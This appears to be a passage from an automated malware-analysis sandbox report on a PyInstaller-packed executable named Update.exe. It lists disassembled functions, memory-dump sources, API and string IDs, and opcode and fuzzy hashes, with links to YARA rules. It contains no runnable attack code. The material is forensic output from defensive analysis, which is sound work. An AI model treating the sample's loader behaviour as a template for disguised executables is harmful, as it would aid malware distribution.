                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                              • String ID: csm
                                                              • API String ID: 2395640692-1018135373
                                                              • Opcode ID: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                              • Instruction ID: 6771de1bf975fb8a274c0416582beb07759f16ba81b26082142c358f99972fda
                                                              • Opcode Fuzzy Hash: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                              • Instruction Fuzzy Hash: 0651B033A196028ADF148F15F845A783391FB44B98F908176EE4D9B784EF7CEA42C701
                                                              Function 00007FF623F7EED8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: CallEncodePointerTranslator
                                                              • String ID: MOC$RCC
                                                              • API String ID: 3544855599-2084237596
                                                              • Opcode ID: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                              • Instruction ID: 58edbb9d96c1fdba07c22b43ba8ed2d15d826bac9c4030db3ee0b2c45a8293d6
                                                              • Opcode Fuzzy Hash: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                              • Instruction Fuzzy Hash: C661A6329087C585DB208F15F8417A9B7A0FB95B94F044275EB9C9BB59DF7CD190CB01
                                                              Function 00007FF623F7F288 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                              • String ID: csm$csm
                                                              • API String ID: 3896166516-3733052814
                                                              • Opcode ID: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                              • Instruction ID: 19d2c54cf1de75fb67bc90540d3d4904e5f622de78f8bfd2453a019b6c69e10b
                                                              • Opcode Fuzzy Hash: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                              • Instruction Fuzzy Hash: DD519F32A0838286EF748F25E84666877A4FB54B84F1541B6DA5DABBC5CF3CE650C702
                                                              Function 00007FF623F77E20 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateDirectoryW.KERNEL32(00000000,?,00007FF623F7352C,?,00000000,00007FF623F73F1B), ref: 00007FF623F77F32
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: CreateDirectory
                                                              • String ID: %.*s$%s%c$\
                                                              • API String ID: 4241100979-1685191245
                                                              • Opcode ID: 302ffdc47f1f131389ecc473fe7ae023bae846d875cccfc6523225b15fd92315
                                                              • Instruction ID: 0e863aa9f5a5636fa9361145789b993a6251270fdf9eef3d74353bd50db5fb85
                                                              • Opcode Fuzzy Hash: 302ffdc47f1f131389ecc473fe7ae023bae846d875cccfc6523225b15fd92315
                                                              • Instruction Fuzzy Hash: 7431C321629AC145FE218B20FC127FA6354EB84BE4F404271EA6D9B7C9EF2CD7058741
                                                              Function 00007FF623F72810 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 65windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: Message
                                                              • String ID: ERROR$Error$[PYI-%d:%ls]
                                                              • API String ID: 2030045667-255084403
                                                              • Opcode ID: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                              • Instruction ID: 7d7e727b8e945b7f3026d7fded181585a66cd9559cb8f2b88501fe742412f3bd
                                                              • Opcode Fuzzy Hash: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                              • Instruction Fuzzy Hash: C221BC62B08B4192EB209B15F8427AA63A0EB88780F404136EE8DA7659EF3CD749C741
                                                              Function 00007FF623F8C5A0 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: FileWrite$ConsoleErrorLastOutput
                                                              • String ID:
                                                              • API String ID: 2718003287-0
                                                              • Opcode ID: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                              • Instruction ID: e917b9690f21b07b2a036c617f1d9907808472a5db55dfe2908e61a70d5635a8
                                                              • Opcode Fuzzy Hash: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                              • Instruction Fuzzy Hash: C7D12572B09A4189EB14CF66E8412AC7BB1FB54BD8B4042B5DE4DE7B99DF38D606C301
                                                              Function 00007FF623F8F98C Relevance: 6.2, APIs: 4, Instructions: 162COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: _get_daylight$_isindst
                                                              • String ID:
                                                              • API String ID: 4170891091-0
                                                              • Opcode ID: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                              • Instruction ID: c09000c481b139f624ce964bd6eae216fc147529ed6445a233890586446d62ff
                                                              • Opcode Fuzzy Hash: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                              • Instruction Fuzzy Hash: B251E672F043128BEF18CF69BD566BC2761AB443A8F514275DD1EA3BE5DF38A6028701
                                                              Function 00007FF623F8577C Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                              • String ID:
                                                              • API String ID: 2780335769-0
                                                              • Opcode ID: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
                                                              • Instruction ID: 97e9f6225ebcfaf71064f587e13e4022248f075250c80b74b74a3a4308da7fe3
                                                              • Opcode Fuzzy Hash: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
                                                              • Instruction Fuzzy Hash: 1D518222E086458BFF14CF72E9523BD37A2AB48B98F148575DE0DA7689DF38D641C702
                                                              Function 00007FF623F720C0 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: LongWindow$DialogInvalidateRect
                                                              • String ID:
                                                              • API String ID: 1956198572-0
                                                              • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                              • Instruction ID: 190ba110bade15a2c8ba021cda0a620b6aaf6efc90c09274e4fbb03aac14a1ba
                                                              • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                              • Instruction Fuzzy Hash: CF112921A1C14282FE548F69FD462B91292FB84780F448070DB495BB9ACF6DDA958202
                                                              Function 00007FF623F95B1C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: _get_daylight$_invalid_parameter_noinfo
                                                              • String ID: ?
                                                              • API String ID: 1286766494-1684325040
                                                              • Opcode ID: 21862b7f5a6063227688de7d7fc5fbfc7fa1fb1d7946118fe9e576ba790fa6aa
                                                              • Instruction ID: 83c60e1fb4f54a3e4a79aa84e5ae70ab4296b29a26632ff6241c41f55264b59f
                                                              • Opcode Fuzzy Hash: 21862b7f5a6063227688de7d7fc5fbfc7fa1fb1d7946118fe9e576ba790fa6aa
                                                              • Instruction Fuzzy Hash: 91410522A0828246FF649F26BC0237A6650EB80BE4F148275EF5C97BD5DF3CD6418702
                                                              Function 00007FF623F89014 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _invalid_parameter_noinfo.LIBCMT ref: 00007FF623F89046
                                                                • Part of subcall function 00007FF623F8A948: RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF623F92D22,?,?,?,00007FF623F92D5F,?,?,00000000,00007FF623F93225,?,?,?,00007FF623F93157), ref: 00007FF623F8A95E
                                                                • Part of subcall function 00007FF623F8A948: GetLastError.KERNEL32(?,?,?,00007FF623F92D22,?,?,?,00007FF623F92D5F,?,?,00000000,00007FF623F93225,?,?,?,00007FF623F93157), ref: 00007FF623F8A968
                                                              • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF623F7CBA5), ref: 00007FF623F89064
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: ErrorFileLanguagesLastModuleNamePreferredRestoreThread_invalid_parameter_noinfo
                                                              • String ID: C:\Users\user\Desktop\Update.exe
                                                              • API String ID: 2553983749-1768034453
                                                              • Opcode ID: 136b352ca89953b7aac46d199a587659114d0cf60bae53edf27061cb20026a80
                                                              • Instruction ID: 593411921f3b555df8f6e26dce1b84cebcac1e1bed27551df25f9a05b9c116fe
                                                              • Opcode Fuzzy Hash: 136b352ca89953b7aac46d199a587659114d0cf60bae53edf27061cb20026a80
                                                              • Instruction Fuzzy Hash: 12417C32A08B0296EF199F22BC460B967A5EB447D0B554075ED4EA7B95DF3CE681C302
                                                              Function 00007FF623F8CC38 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: ErrorFileLastWrite
                                                              • String ID: U
                                                              • API String ID: 442123175-4171548499
                                                              • Opcode ID: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                              • Instruction ID: 537f02b41d420c57e4db57f63c1ff5e07a04c43852b8cc3490226edb0dc268b7
                                                              • Opcode Fuzzy Hash: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                              • Instruction Fuzzy Hash: 1241B232B19A8181EB209F26F8453AAA7A1FB89BC4F404131EE4DD7798EF3CD501C741
                                                              Function 00007FF623F8F5B8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: CurrentDirectory
                                                              • String ID: :
                                                              • API String ID: 1611563598-336475711
                                                              • Opcode ID: d7e4ed55f29cf6b5985c16ba7c582ed18ee62b51760ed1b5a20f115a32bf7e2e
                                                              • Instruction ID: 0a940bc60a88fbf771b7aefe55a1f53a7f495d09827874b143850ab3efdac13a
                                                              • Opcode Fuzzy Hash: d7e4ed55f29cf6b5985c16ba7c582ed18ee62b51760ed1b5a20f115a32bf7e2e
                                                              • Instruction Fuzzy Hash: 19213922B1834185EF288F12F84623D33A1FB84B84F468175D64CA3294DF7CDA44C742
                                                              Function 00007FF623F7FD48 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: ExceptionFileHeaderRaise
                                                              • String ID: csm
                                                              • API String ID: 2573137834-1018135373
                                                              • Opcode ID: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                              • Instruction ID: 323b94d718675f91b4ae4befd456472519ee6fb56b2f6504c6085f937d8bf846
                                                              • Opcode Fuzzy Hash: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                              • Instruction Fuzzy Hash: CB112E32618B8182EB618F15F84025977E4FB88B84F594270DB8D5B754DF3CDA518740
                                                              Function 00007FF623F9073C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: DriveType_invalid_parameter_noinfo
                                                              • String ID: :
                                                              • API String ID: 2595371189-336475711
                                                              • Opcode ID: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                              • Instruction ID: 0bbbad497ee6e6cdd14f66b7ed65495ed5db67aebdf396aa308d87656ef8f151
                                                              • Opcode Fuzzy Hash: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                              • Instruction Fuzzy Hash: B8017121A1820385FF249F60BC6327E22A0EF44794F804475D94DE7691EF2CD6048B17

                                                              Executed Functions

                                                              Function 00007FF623F71000 Relevance: 60.0, APIs: 6, Strings: 28, Instructions: 509COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: ErrorFileLastModuleName
                                                              • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
                                                              • API String ID: 2776309574-3273434969
                                                              • Opcode ID: 4651f0dbc160d0404dcf25292df1705b0130bb44d3f559e05366d82f1582b67c
                                                              • Instruction ID: 7711b14714017a278529e09c4c39fb9cd508be72dace2bf859efe74b3414ff9c
                                                              • Opcode Fuzzy Hash: 4651f0dbc160d0404dcf25292df1705b0130bb44d3f559e05366d82f1582b67c
                                                              • Instruction Fuzzy Hash: 07329121A0C682A1FF15DB25BD572F922A1AF44780F4440B6DA4DEB2D6EF2CE759C343
                                                              Function 00007FFDFAEE195B Relevance: 23.5, APIs: 5, Strings: 8, Instructions: 785COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986715794.00007FFDFAEE1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAEE0000, based on PE: true
                                                              • Associated: 00000001.00000002.1986686816.00007FFDFAEE0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF54000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF56000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF79000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF84000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF8E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986917456.00007FFDFAF91000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986947251.00007FFDFAF93000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $..\s\ssl\record\ssl3_record.c$@$CONNE$GET $HEAD $POST $PUT
                                                              • API String ID: 0-352295518
                                                              • Opcode ID: 3479779f4e97ba25f539c5ee64d721bf2629ffcc85696f0b63aa88c04eb821c1
                                                              • Instruction ID: f88375f61b8a2233c610700a0523eb97e45e8531eab670f79b4e999cde510eac
                                                              • Opcode Fuzzy Hash: 3479779f4e97ba25f539c5ee64d721bf2629ffcc85696f0b63aa88c04eb821c1
                                                              • Instruction Fuzzy Hash: 0872A571B0868285FB68AF15E464BB937A0EB44B88F544175DA6E4B7CCEF7ED580C700
                                                              Function 00007FF623F96964 Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                              • String ID:
                                                              • API String ID: 1617910340-0
                                                              • Opcode ID: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                              • Instruction ID: 286e93c58231b938e16619de27d165c900ed2f0c7965bdbb7e73cdadd1c0a804
                                                              • Opcode Fuzzy Hash: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                              • Instruction Fuzzy Hash: DFC1F332B28A8185EF10CF65E8926AC3761FB49BA8F014275DE1EAB7D4DF38D651C301
                                                              Function 00007FFDFB2F6EE0 Relevance: 11.4, APIs: 4, Strings: 2, Instructions: 893librarymemoryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1987760370.00007FFDFB2F6000.00000080.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFAFA0000, based on PE: true
                                                              • Associated: 00000001.00000002.1986977487.00007FFDFAFA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
